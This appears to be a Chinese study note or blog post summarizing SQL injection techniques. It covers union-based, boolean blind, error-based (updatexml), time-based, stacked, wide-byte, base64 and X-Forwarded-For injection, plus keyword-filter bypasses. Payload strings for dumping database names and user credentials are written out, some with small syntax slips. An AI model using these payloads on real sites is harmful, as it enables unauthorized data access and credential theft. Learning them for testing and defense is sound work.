SQL笔记

判断是否存在sql注入首先在id后加’ 再次加载再注释--+   ,实现逃逸后进行and 1=1和and 1=2两个回显页面并比较,如果不同则存在sql注入漏洞

联合查询:union select
                 order by
                 爆表
                 group_concat(table_name)(table_name)from information_schema.table where table_schema=' 数据库名字  '
        爆字段名
        group_concat( '存放用户信息的字段名‘
                 爆用户名和密码
                 group_concat(username,id,password)添加id分隔用户名和密码。
布尔盲注:首先无论拼接’ - ” )均无回显或者说回显不变说明联合查询失效,需要尝试盲注
                 先判断数据库库名长度 'and length(database())>=1--+
        判断数据库库名 ' and substr(database(),1,1)=' '--+
                引号里填写a-z,0-9 判断且字母不分大小写
                同样的可以将字母利用org函数转换为ascii码进行判断,例如
'and ord(substr(database(),2,1)=115--+
       s 的ascii码是115
       同样的操作多次重复便可得到数据库名称和用户信息,例如   ' and substr((select table_name from information_schema.table where table_schema=' 数据库名字  ' limit 0,1),1,1)=''--+
                 
                 ' and substr((select column_name from information_schema.columns where table_name='存放用户信息的字段名‘ limit 0,1),1,1)=''--+
报错注入:updatexml()函数
                   ’ and updatexml (1,concat(0x7e,(select database())),0x7e),1)--+(获得数据库名称)
                 ‘ and updatexml (1,concat(0x7e,(select user())),0x7e),1)--+(获得users)
                   ’ and updatexml (1,concat(0x7e,(select 联合查询语句         limit m,n),0x7e),1)--+
时间注入:sleep()函数
一般与if函数链接使用

             例如 if(length(database())>1,sleep(5),1)即若库名长度大于1,则mysql查询休眠5秒,否则查询1
              同样可以利用sleep函数实现盲注即将sleep与substr函数结合实现对库名、表名以及字段名的猜测
堆叠注入则是利用分号将不同sql语句连起来而如果数据库中有PDO函数则应该在第二句sql语句中使用update和时间盲注进行查询。

二次注入则是通过已知信息通过不断注入恶意sql语句不断扩大漏洞从而获得更多的敏感信息。

宽字节注入则是利用转码和不同数据库编码从而实现逃逸,进而进行恶意sql语句注入,例如:
当‘被转码为\而当数据库编码为GBK时,反斜杠编码为%5c。
 而宽字节注入格式为在地址后面添加%df,而此时%df%5c结合在GBK编码下是‘連’此时可以实现逃逸。


而base64注入则是数据库对数据进行base64转码,进而我们的注入语句判断首先要进行base64编码。而判断出有sql注入漏洞后即可进行联合查询。

XFF注入即利用bp抓包查看X-Forward-for如有该网址ip即进行判断是否有sql注入漏洞,如果有,进行联合查询从而完成注入。

网站在搭建时会对sql语句中的关键词句进行过滤,应运而生则出现了sql绕过
大小写绕过:例如and写为And或者写为AND
双写绕过则是过滤关键字符例如过滤or则输入or则不存在,输入order显示der,语句错误,这就是被过滤了,而绕开方式就是写成oorr和oorrder.
编码绕过:如果and被过滤则可以对and进行url全局编码进行绕过。
也可以通过内联注释绕过即id=1 and 1=1写为id=1 /*!and*/ 1=1

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值